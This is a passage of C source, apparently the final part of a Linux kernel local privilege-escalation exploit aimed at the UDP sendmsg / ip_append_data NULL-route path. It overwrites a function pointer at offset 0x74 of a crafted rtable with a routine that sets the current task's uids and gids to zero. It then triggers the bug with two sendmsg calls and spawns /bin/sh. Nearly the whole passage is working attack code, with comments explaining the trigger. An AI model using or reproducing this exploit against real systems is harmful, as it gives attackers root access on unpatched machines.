          exit(-1);
       }
       *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;

       /* trigger exploit
        *
        * the second sendmsg() call will call ip_append_data() with rt == NULL
        * because of:
        * if (up->pending) {
        *          *
        *          * There are pending frames.
        *          * The socket lock must be held while it's corked.
        *          *
        *          lock_sock(sk);
        *          if (likely(up->pending)) {
        *                    if (unlikely(up->pending != AF_INET)) {
        *                            release_sock(sk);
        *                            return -EINVAL;
        *                    }
        *                    goto do_append_data;
        *            }
        *            release_sock(sk);
        *    }
        *
        */
       sendmsg(s, &header, MSG_MORE|MSG_PROXY);
       sendmsg(s, &header, 0);

       close(s);

       system("/bin/sh");

       return 0;
    }
